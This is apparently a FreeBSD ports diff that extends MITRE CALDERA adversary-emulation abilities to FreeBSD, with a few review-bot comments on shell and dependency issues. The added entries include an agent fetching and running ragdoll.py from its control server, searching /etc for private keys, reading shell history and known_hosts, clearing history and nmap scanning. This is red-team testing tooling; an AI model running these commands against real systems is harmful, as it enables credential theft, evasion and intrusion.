b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_4e97e699-93d7-4040-b5a3-2e906a58199e.yml 
@@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml +@@ -12,7 +12,7 @@ + sh: + command: | + cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]} +- linux: ++ freebsd,linux: + sh: + command: | + cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]} diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_6469befa-748a-4b9c-a96d-f191fde47d89.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_6469befa-748a-4b9c-a96d-f191fde47d89.yml new file mode 100644 index 000000000000..43e4ef8bb20b --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_6469befa-748a-4b9c-a96d-f191fde47d89.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml +@@ -17,7 +17,7 @@ + parsers: + plugins.stockpile.app.parsers.basic: + - source: host.dir.staged +- linux: ++ freebsd,linux: + sh: + command: | + mkdir -p staged && echo $PWD/staged diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_720a3356-eee1-4015-9135-0fc08f7eb2d5.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_720a3356-eee1-4015-9135-0fc08f7eb2d5.yml new file mode 100644 index 000000000000..a5bf3dd80e57 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_720a3356-eee1-4015-9135-0fc08f7eb2d5.yml 
@@ -0,0 +1,18 @@ +--- plugins/stockpile/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml +@@ -6,7 +6,7 @@ + attack_id: T1005 + name: Data from Local System + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do +@@ -21,4 +21,4 @@ + Get-ChildItem C:\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter ".git" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0; + parsers: + plugins.stockpile.app.parsers.basic: +- - source: host.dir.git +\ No newline at end of file ++ - source: host.dir.git diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_89955f55-529d-4d58-bed4-fed9e42515ec.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_89955f55-529d-4d58-bed4-fed9e42515ec.yml new file mode 100644 index 000000000000..45cd636b78b1 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_89955f55-529d-4d58-bed4-fed9e42515ec.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml +@@ -12,7 +12,7 @@ + sh: + command: | + curl #{remote.host.socket} +- linux: ++ freebsd,linux: + sh: + command: | + curl #{remote.host.socket} diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml new file mode 100644 index 000000000000..d9d913ade3c7 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml 
@@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml +@@ -27,7 +27,7 @@ + - source: host.file.path + edge: has_extension + target: file.sensitive.extension +- linux: ++ freebsd,linux: + sh: + command: | + find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\.*' -size -500k 2>/dev/null | head -5 diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_b007fe0c-c6b0-4fda-915c-255bbc070de2.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_b007fe0c-c6b0-4fda-915c-255bbc070de2.yml new file mode 100644 index 000000000000..c21d7db379f6 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_b007fe0c-c6b0-4fda-915c-255bbc070de2.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml +@@ -16,7 +16,7 @@ + psh,pwsh: + command: | + Get-Clipboard -raw +- linux: ++ freebsd,linux: + sh: + command: | + xclip -o diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_command-and-control_0ab383be-b819-41bf-91b9-1bd4404d83bf.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_command-and-control_0ab383be-b819-41bf-91b9-1bd4404d83bf.yml new file mode 100644 index 000000000000..e369cd256f0c --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_command-and-control_0ab383be-b819-41bf-91b9-1bd4404d83bf.yml 
@@ -0,0 +1,15 @@ +--- plugins/stockpile/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml +@@ -24,3 +24,12 @@ + python ragdoll.py -W $server#{app.contact.html} + cleanup: | + pkill -f ragdoll ++ freebsd: ++ sh: ++ command: | ++ server="#{app.contact.http}"; ++ curl -s -X POST -H "file:ragdoll.py" -H "platform:freebsd" $server/file/download > ragdoll.py; ++ pip install requests beautifulsoup4; ++ python ragdoll.py -W $server#{app.contact.html} ++ cleanup: | ++ pkill -f ragdoll diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_credential-access_422526ec-27e9-429a-995b-c686a29561a4.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_credential-access_422526ec-27e9-429a-995b-c686a29561a4.yml new file mode 100644 index 000000000000..e618197bae13 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_credential-access_422526ec-27e9-429a-995b-c686a29561a4.yml @@ -0,0 +1,12 @@ +--- plugins/stockpile/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml +@@ -20,3 +20,9 @@ + parsers: + plugins.stockpile.app.parsers.ssh: + - source: remote.ssh.cmd ++ freebsd: ++ sh: ++ command: cat ~/.history ++ parsers: ++ plugins.stockpile.app.parsers.ssh: ++ - source: remote.ssh.cmd diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_credential-access_de632c2d-a729-4b77-b781-6a6b09c148ba.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_credential-access_de632c2d-a729-4b77-b781-6a6b09c148ba.yml new file mode 100644 index 000000000000..6558aabecb22 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_credential-access_de632c2d-a729-4b77-b781-6a6b09c148ba.yml 
@@ -0,0 +1,13 @@ +--- plugins/stockpile/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml +@@ -19,7 +19,7 @@ + sh: + command: | + for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name "*${i}" 2>/dev/null;done; +- linux: ++ freebsd,linux: + sh: + command: | +- for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name "*${i}" 2>/dev/null;done; +\ No newline at end of file ++ for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name "*${i}" 2>/dev/null;done; diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_36eecb80-ede3-442b-8774-956e906aff02.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_36eecb80-ede3-442b-8774-956e906aff02.yml new file mode 100644 index 000000000000..81bbb5325bd5 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_36eecb80-ede3-442b-8774-956e906aff02.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml +@@ -11,7 +11,7 @@ + darwin: + sh: + command: sleep 60 +- linux: ++ freebsd,linux: + sh: + command: sleep 60 + windows: diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_43b3754c-def4-4699-a673-1d85648fda6a.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_43b3754c-def4-4699-a673-1d85648fda6a.yml new file mode 100644 index 000000000000..6d8cfc3162c4 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_43b3754c-def4-4699-a673-1d85648fda6a.yml 
@@ -0,0 +1,15 @@
+--- plugins/stockpile/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml
+@@ -16,6 +16,10 @@
+ sh:
+ command: |
+ > $HOME/.bash_history && unset HISTFILE
++ freebsd:
++ sh:
++ command: |
++ > $HOME/.history && set history = 0
+ windows:
+ psh:
+- command: Clear-History;Clear
+\ No newline at end of file
++ command: Clear-History;Clear
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_4cd4eb44-29a7-4259-91ae-e457b283a880.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_4cd4eb44-29a7-4259-91ae-e457b283a880.yml
new file mode 100644
index 000000000000..51d0b7dd24dd
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_4cd4eb44-29a7-4259-91ae-e457b283a880.yml
@@ -0,0 +1,17 @@
+--- plugins/stockpile/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml
+@@ -12,11 +12,11 @@
+ sh:
+ cleanup: |
+ rm #{payload}
+- linux:
++ freebsd,linux:
+ sh:
+ cleanup: |
+ rm #{payload}
+ windows:
+ psh,pwsh:
+ cleanup: |
+- Remove-Item -Force -Path "#{payload}"
+\ No newline at end of file
++ Remove-Item -Force -Path "#{payload}"
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_5f844ac9-5f24-4196-a70d-17f0bd44a934.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_5f844ac9-5f24-4196-a70d-17f0bd44a934.yml
new file mode 100644
index 000000000000..d5ca5155314f
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_defense-evasion_5f844ac9-5f24-4196-a70d-17f0bd44a934.yml
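Review bot: The added `freebsd` entry in 43b3754c-def4-4699-a673-1d85648fda6a.yml is declared under the `sh` executor, but its command line mixes two shells: the bare `>` redirection is Bourne syntax, while `set history = 0` is csh/tcsh syntax. Under a Bourne-type shell the `set` only replaces the positional parameters, so the step exits successfully without changing any history setting. Anyone using this ability to validate a detection on FreeBSD would therefore be exercising only the truncation of `$HOME/.history`. Which shell the agent actually uses cannot be told from the hunk, so I would record the assumption above the `freebsd:` key, for example `# NOTE: 'set history = 0' is csh/tcsh syntax; confirm which shell the sh executor invokes on FreeBSD`.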
@@ -0,0 +1,15 @@
+--- plugins/stockpile/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml
+@@ -25,9 +25,9 @@
+ path="$(pwd)/#{exe_name}";
+ num_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep "$path"; done | wc -l);
+ if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi;
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ path="$(pwd)/#{exe_name}";
+ num_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep "$path"; done | wc -l);
+- if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi;
+\ No newline at end of file
++ if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi;
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_30732a56-4a23-4307-9544-09caf2ed29d5.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_30732a56-4a23-4307-9544-09caf2ed29d5.yml
new file mode 100644
index 000000000000..eb1e2728e0be
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_30732a56-4a23-4307-9544-09caf2ed29d5.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml
+@@ -12,7 +12,7 @@
+ sh:
+ command: |
+ find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \;
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \;
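Review bot: Extending the 5f844ac9 entry to `freebsd,linux` makes the in-use check depend on `lsof`, which is not part of the FreeBSD base system; with `2> /dev/null` hiding the command-not-found error, `num_processes` evaluates to 0, the `-le 1` test always passes, and `/bin/rm -f "$path"` runs even when other processes still use the file. The guard the linux entry relies on is therefore silently absent on a stock FreeBSD host. A check such as `command -v lsof >/dev/null 2>&1 || exit 1;` ahead of the count would surface the missing tool in the operation output instead. The start of this ability's platform list lies above the hunk, so placement should be confirmed against the full file.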
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_335cea7b-bec0-48c6-adfb-6066070f5f68.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_335cea7b-bec0-48c6-adfb-6066070f5f68.yml
new file mode 100644
index 000000000000..f85f5fb163dd
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_335cea7b-bec0-48c6-adfb-6066070f5f68.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml
+@@ -12,7 +12,7 @@
+ sh:
+ command: |
+ ps
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ ps
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml
new file mode 100644
index 000000000000..1f0678a03bf0
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml
+@@ -12,7 +12,7 @@
+ sh:
+ command: |
+ nmap -sV -p #{remote.host.port} #{remote.host.ip}
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ nmap -sV -p #{remote.host.port} #{remote.host.ip}
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml
new file mode 100644
index 000000000000..9b6d16a6890e
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml
+@@ -12,7 +12,7 @@
+ sh:
+ command: |
+ ps aux | grep #{host.user.name}
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ ps aux | grep #{host.user.name}
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml
new file mode 100644
index 000000000000..537f8779c2a9
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml
@@ -0,0 +1,17 @@
+--- plugins/stockpile/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml
+@@ -28,3 +28,14 @@
+ target: remote.host.port
+ payloads:
+ - scanner.py
++ freebsd:
++ sh:
++ command: |
++ python3.9 scanner.py -i #{remote.host.ip}
++ parsers:
++ plugins.stockpile.app.parsers.scan:
++ - source: remote.host.ip
++ edge: has_open_port
++ target: remote.host.port
++ payloads:
++ - scanner.py
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml
new file mode 100644
index 000000000000..e29e243da46c
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml
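Review bot: `python3.9 scanner.py` in the added `freebsd:` entry of the 47abe1f5 patch pins the interpreter to one minor version on the agent host, which need not match the Python the CALDERA server runs on and will stop being installed as the ports default moves on. The step then fails with command-not-found and the `has_open_port` parser simply records nothing, which is easy to misread as a clean result. I would document the requirement next to the command, e.g. `# requires lang/python39 on the agent host; adjust when the default Python version changes`, or have the port substitute the interpreter name when the patch is applied. The entries this block mirrors start above the hunk.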
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml
+@@ -12,7 +12,7 @@
+ sh:
+ command: |
+ ls
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ ls
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml
new file mode 100644
index 000000000000..4adc35e7b332
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml
@@ -0,0 +1,12 @@
+--- plugins/stockpile/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml
+@@ -42,6 +42,6 @@
+ darwin:
+ sh:
+ command: ps aux
+- linux:
++ freebsd,linux:
+ sh:
+- command: ps aux
+\ No newline at end of file
++ command: ps aux
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml
new file mode 100644
index 000000000000..493ff051dcdd
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml
@@ -0,0 +1,12 @@
+--- plugins/stockpile/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml
+@@ -15,6 +15,6 @@
+ darwin:
+ sh:
+ command: groups
+- linux:
++ freebsd,linux:
+ sh:
+- command: groups
+\ No newline at end of file
++ command: groups
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml
new file mode 100644
index 000000000000..09037b912637
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml
+@@ -12,7 +12,7 @@
+ sh:
+ command: |
+ cat ~/.ssh/known_hosts
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ cat ~/.ssh/known_hosts
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_638fb6bb-ba39-4285-93d1-7e4775b033a8.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_638fb6bb-ba39-4285-93d1-7e4775b033a8.yml
new file mode 100644
index 000000000000..5c197bd60b6a
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_638fb6bb-ba39-4285-93d1-7e4775b033a8.yml
@@ -0,0 +1,13 @@
+--- plugins/stockpile/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml
+@@ -15,6 +15,10 @@
+ sh:
+ command: |
+ netstat -anto
++ freebsd:
++ sh:
++ command: |
++ netstat -aSp tcp
+ windows:
+ psh:
+ command: |
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_6c91884e-11ec-422f-a6ed-e76774b0daac.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_6c91884e-11ec-422f-a6ed-e76774b0daac.yml
new file mode 100644
index 000000000000..400b12042c7a
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_6c91884e-11ec-422f-a6ed-e76774b0daac.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml
+@@ -14,7 +14,7 @@
+ - source: host.print.file
+ edge: has_size
+ target: host.print.size
+- linux:
++ freebsd,linux:
+ sh:
+ command: lpq -a
+ parsers:
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_6e1a53c0-7352-4899-be35-fa7f364d5722.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_6e1a53c0-7352-4899-be35-fa7f364d5722.yml
new file mode 100644
index 000000000000..8daee82cafc7
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_6e1a53c0-7352-4899-be35-fa7f364d5722.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml
+@@ -12,7 +12,7 @@
+ sh:
+ command: |
+ pwd
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ pwd
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_830bb6ed-9594-4817-b1a1-c298c0f9f425.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_830bb6ed-9594-4817-b1a1-c298c0f9f425.yml
new file mode 100644
index 000000000000..97137b959bd7
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_830bb6ed-9594-4817-b1a1-c298c0f9f425.yml
@@ -0,0 +1,10 @@
+--- plugins/stockpile/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml
+@@ -16,3 +16,7 @@
+ sh:
+ command: |
+ which google-chrome
++ freebsd:
++ sh:
++ command: |
++ which chrome
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_85341c8c-4ecb-4579-8f53-43e3e91d7617.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_85341c8c-4ecb-4579-8f53-43e3e91d7617.yml
new file mode 100644
index 000000000000..c48e5c1e638d
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_85341c8c-4ecb-4579-8f53-43e3e91d7617.yml
@@ -0,0 +1,18 @@
+--- plugins/stockpile/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml
+@@ -14,7 +14,7 @@
+ parsers:
+ plugins.stockpile.app.parsers.ipaddr:
+ - source: remote.host.ip
+- linux:
++ freebsd,linux:
+ sh:
+ command: arp -a
+ parsers:
+@@ -25,4 +25,4 @@
+ command: arp -a
+ parsers:
+ plugins.stockpile.app.parsers.ipaddr:
+- - source: remote.host.ip
+\ No newline at end of file
++ - source: remote.host.ip
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_9849d956-37ea-49f2-a8b5-f2ca080b315d.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_9849d956-37ea-49f2-a8b5-f2ca080b315d.yml
new file mode 100644
index 000000000000..322ba3f70c2b
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_9849d956-37ea-49f2-a8b5-f2ca080b315d.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml
+@@ -12,7 +12,7 @@
+ sh:
+ command: |
+ which go
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ which go
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_a41c2324-8c63-4b15-b3c5-84f920d1f226.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_a41c2324-8c63-4b15-b3c5-84f920d1f226.yml
new file mode 100644
index 000000000000..803f409699a0
--- /dev/null
+++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_a41c2324-8c63-4b15-b3c5-84f920d1f226.yml
@@ -0,0 +1,11 @@
+--- plugins/stockpile/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml
+@@ -6,7 +6,7 @@
+ attack_id: T1083
+ name: File and Directory Discovery
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: 'find ~ -type f -name #{host.print.file} 2>/dev/null'
+ parsers:
diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_discovery_b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml
new file mode 100644
